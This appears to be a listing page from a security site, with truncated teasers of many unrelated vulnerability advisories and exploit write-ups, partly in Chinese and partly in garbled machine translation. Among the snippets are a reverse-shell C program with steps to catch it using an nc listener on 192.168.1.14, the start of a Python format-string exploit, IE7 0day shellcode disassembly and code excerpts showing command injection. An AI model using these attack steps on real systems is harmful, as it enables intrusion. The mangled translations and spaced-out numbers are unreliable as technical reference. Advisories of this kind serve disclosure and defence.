Microsoft Windows帮助和支持中心绕过白名单限制漏洞

BUGTRAQ ID: 40725,40721 CVE ID: CVE-2010-1885 Windows是微软发布的非常流行的操作系统。 Windows中默认提供了帮助和支持中心以访问在线文档，可通过hcp://形式的URL直接访问帮助文档。在通过注册的协议处理器调用hcp:// URL时，会向帮助中心应用传送命令行参数/fromhcp，这个标记将帮助中心切换到受限制的模式，仅允许白名单中的帮助文档和参数。但这个白名单实现并不安全，可能被绕过。 在进行验证之前首先要使用MPC::HTML::UrlUnescapeW函数规范化和转义URL，该函数使用MPC::HexToNum将...

Introduction to Malware Analysis

In this video, Lenny Zeltser, a SANS instructor, outlines the basic concepts of reverse engineering malware, describing the process of analyzing the code and the behavior of the malware...

phpCollegeExchange 0.1.5c - Multiple SQL Injections

phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities Name phpCollegeExchange Vendor http://phpcollegeex.sourceforge.net Versions Affected 0.1.5c Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta at gmail dot com Date 2009-12-11 X...

OrzHTTPd - Format String

!/usr/bin/env python orzex.py -- Patroklos Argyroudis, argp at domain census-labs.com http://code.google.com/p/orzhttpd/source/detail?r=141 import os import sys import socket import struct import time import urllib GET = "GET " def mainargv: argc = lenargv if argc != 4: print "usage: %s " % argv0...

CubeCart 4 - Session Management Bypass

CubeCart 4 - Session Management Bypass CubeCart 4 Session Management Bypass Release Date: 2009/10/29 Author: Bogdan Calin bogdan at acunetix dot com Severity: Critical Vendor Status: Vendor has released an updated version I. Background From Wikipedia: CubeCart is a free-to-use eCommerce software...

linux rally SHELL II-vulnerability warning-the black bar safety net

include include include include include include include void usage; char shell="/bin/sh"; char message="s8s8 welcome\n"; int sock; int mainint argc, char argv ifargc \n", prog; exit-1; gcc-o f f. c Then on the machine listening on a port nc-l-p 8 8 8 8 Then execute./ f 192.168.1.14 8 8 8 8 Note:...

Bo-Blog 2.0.3 background plug horse execute arbitrary commands vulnerability-vulnerability warning-the black bar safety net

| Article source: &&www.slenk.net Article author: lone water around the city Today analyzed under the Bo-Blog 2.0.3 of the code, The event is by this version of the Flyh4t big cow release of a known injection vulnerability. Into the backend crunching for half a day, and looked under the code,...

LxBlog变量未初始化漏洞

Lxblog 是 PHPWind 开发的一套基于 PHP+MySQL 数据库平台架构的多用户博客系统，强调整站与用户个体间的交互，拥有强大的个人主页系统、独立的二级域名体系、灵活的用户模板系统、丰富的朋友圈和相册功能。 代码分析片段： =======================code================================== /user/tag.php ?php !functionexists'usermsg' && exit'Forbidden'; !inarray$type,$itemtype && exit;...

aMule 'wxExecute()'任意命令执行漏洞

BUGTRAQ ID: 34683 CNCAN ID：CNCAN-2009042301 aMule是一款与eMule类似的电驴下载软件。 aMule不正确过滤部分字符，远程攻击者可以利用漏洞以应用程序权限执行任意命令。 存在问题的代码src/DownloadListCtrl.cpp： command = wxT"xterm -T "aMule Preview" -iconic -e mplayer '$file'"; ... wxString rawFileName = file-GetFullName.GetRaw; command.ReplacewxT"$file",...

6KBBS system to break the back door file-vulnerability warning-the black bar safety net

From:Dream an end Hello, I'm Dream an end. See the September the the hackers Handbook the lone water around the city, my brother wrote that article, the alarm bells ringing-the vigilant hidden in the web site behind the trap of feeling quite a lot. In this crazy Internet era, made a rookie your o...

Adobe PDF exploit code analysis

Websense researcher Hermes Li has posted a blow-by-blow walkthrough with screenshots of the Adobe Acrobat/Reader vulnerability that’s currently under attack. Excerpt from the blog post: “This vulnerability is different than the one found at the end of last year Exploit Action with PDF OpenAction ...

Amaya Web Editor 11.0 - XML / HTML Parser

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Amaya web editor XML and HTML parser vulnerabilities 1. Advisory Information Title: Amaya web editor XML and HTML parser vulnerabilities Advisory ID: CORE-2008-1211...

A CGI program vulnerability discovery-vulnerability warning-the black bar safety net

Source: phpeval's BLOG Author: phpeval Yesterday a friend threw me acgiprogram. Call me to think of a way to get a SHELL. The CGI program but I've never seen it. Experience this for me brand new things. It really is a bit no way. But to throw to. Just when learning. I bite the bullet and see. The...

IE7 0day shellcode analysis（2）-bug warning-the black bar safety net

The corresponding Assembly code is as follows 0A0FF9FB 5 8 pop eax 0A0FF9FC 5 8 pop eax 0A0FF9FD 33DB xor ebx, ebx 0A0FF9FF B3 1C mov bl, 1C 0A0FFA01 03C3 add eax, ebx 0A0FFA03 31C9 xor ecx, ecx 0A0FFA05 6 6:81E9 65FA sub cx, 0FA65 0A0FFA0A 8 0 3 0 2 1 xor byte ptr eax, 2 1 0A0FFA0D 4 0 inc eax...

[MajorSecurity Advisory #53]BLUEPAGE CMS - Cross Site Scripting and Session Fixation Issues

MajorSecurity Advisory 53BLUEPAGE CMS - Cross Site Scripting and Session Fixation Issues Details ======= Product: BLUEPAGE CMS Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://www.bluepage-cms.com/ Vendor-Status: informed Advisory-Status: published Credits ============ Discovered b...

major_rls53.txt

MajorSecurity Advisory 53BLUEPAGE CMS - Cross Site Scripting and Session Fixation Issues Details ======= Product: BLUEPAGE CMS Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://www.bluepage-cms.com/ Vendor-Status: informed Advisory-Status: published Credits ============ Discovered b...

Php168 read arbitrary file vulnerability-vulnerability warning-the black bar safety net

Reprint address: http://hi.baidu.com/saiyhi/ Oh, forgot to say, the program official URL: http://www.php168.com/ 代码 :..job.php Line:1 1 7 if eregi". php",$url die"ERR"; $fileurl=strreplace$webdbwwwurl,"",$url; ifisfilePHP168PATH."$ fileurl"&&filesizePHP168PATH."$ fileurl"1 0 2 41 0 2 45 0 0...

Phpcms 2 0 0 7 remote file inclusion vulnerability-vulnerability warning-the black bar safety net

zzPhpcms 2 0 0 7 remote file include vulnerability url:http://www. wolvez. org/forum/redirect. php? tid=1 8 2&goto=lastpost This vulnerability is a more common variable coverage holes, where the transfer is due to the discovery of this vulnerability if it is a white box that you want to have a...

Apple Xcode工具.funhouse文件XML数据处理缓冲区溢出漏洞

BUGTRAQ ID: 30189 CVECAN ID: CVE-2008-2304 Xcode是苹果机器上所使用的开发工具。 Xcode工具中包含有名为Core Image Fun House的示例应用程序，用于处理带有.funhouse扩展名的内容。Funhouse应用没有正确地解析XML数据，如果用户受骗打开了特制的.funhouse文件的话，就可能触发缓冲区溢出。以下是负责解析上述文件的代码： // render origin handles using AppKit directly - - CIImage drawPoints:CIImage im ... NSString...

Dedecms V5可执行文件上传漏洞

这是一个比较有意思的东西，但是成功利用起来并不容易，呵呵。 首先看configrglobals.php文件，摘的一段代码如下。这里作者本意是为了帮我们注册变量的，但是他却疏忽了我们不但能注册变量，还能覆盖一些变量。configrglobalsmagic.php也有同样的问题 ………………………………………………………………………… ifisarray$GET foreach$GET AS $key = $value $$key = $value; //可以覆盖任意变量 ………… …………………………………………………………………………...